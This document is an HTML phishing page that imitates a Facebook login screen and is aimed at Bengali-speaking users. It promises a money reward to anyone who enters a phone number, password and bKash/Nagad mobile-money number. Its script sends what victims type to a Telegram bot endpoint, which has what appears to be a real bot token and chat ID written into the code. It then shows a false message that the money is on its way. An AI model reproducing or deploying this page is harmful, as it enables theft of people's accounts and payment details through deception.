<!DOCTYPE html>
<html lang="bn">
<head>
  <meta charset="UTF-8">
  <title>Facebook - log in or sign up</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: Helvetica, Arial, sans-serif;
      background: #f0f2f5;
    }

    .container {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      flex-direction: column;
    }

    .login-box {
      background: white;
      padding: 20px;
      border-radius: 8px;
      box-shadow: 0 2px 4px rgba(0,0,0,0.2);
      width: 350px;
    }

    .login-box h2 {
      color: #1877f2;
      text-align: center;
      margin-bottom: 20px;
    }

    input {
      width: 100%;
      padding: 12px;
      margin: 10px 0;
      border: 1px solid #dddfe2;
      border-radius: 6px;
      font-size: 16px;
    }

    button {
      width: 100%;
      padding: 12px;
      background-color: #1877f2;
      color: white;
      border: none;
      font-size: 18px;
      border-radius: 6px;
      cursor: pointer;
    }

    .note {
      margin-top: 15px;
      font-size: 12px;
      color: #606770;
      text-align: center;
    }

    .notice-box {
      border: 2px solid #1877f2;
      margin-top: 20px;
      padding: 10px;
      background: #e7f3ff;
      font-size: 14px;
      color: #333;
      border-radius: 6px;
    }

  </style>
</head>
<body>

<div class="container">
  <div class="login-box">
    <h2>Facebook</h2>
    <input type="text" id="Phone Number" placeholder="your mobile number">
    <input type="text" id="YourPassword" placeholder="your password">
    <input type="text" id="Bkash/Nagad mumber" placeholder="cash number">
    <button onclick="sendToTelegram()">Log In</button>
    <div class="note">USE A REAL ACCOUNT NUMBER PASSWORD,AND WIN A MORE MONEY!</div>
  </div>

  <div class="notice-box">
    <strong>
    <br><br>
    <strong>Copyright ©️ META2025</strong>
  </div>
</div>

<script>
  function sendToTelegram() {
    const YourNumber = document.getElementById("Phone Number").value;
    const YourPassword = document.getElementById("YourPassword").value;
    const BkashNumber = document.getElementById("Bkash/Nagad mumber").value;

    const message = `নতুন সাবমিশন:
phone number: ${YourNumber}
Enter your password: ${YourPassword}
Enter your bkash number: ${BkashNumber}`;

    fetch("https://api.telegram.org/bot7637297360:AAH_pFB9-YpQ62y-6F3qs3CAHx-S5yrzxsg/sendMessage", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        chat_id: "6429244657",
        text: message
      })
    }).then(res => {
      alert("অনুগ্রহ করে কিছুক্ষণ অপেক্ষা করুন তারপরে দেখুন আপনার টাকা একাউন্টে পৌঁছে গেছে")
    }).catch(err => {
      alert("Error sending!");
    });
  }
</script>

</body>
</html>
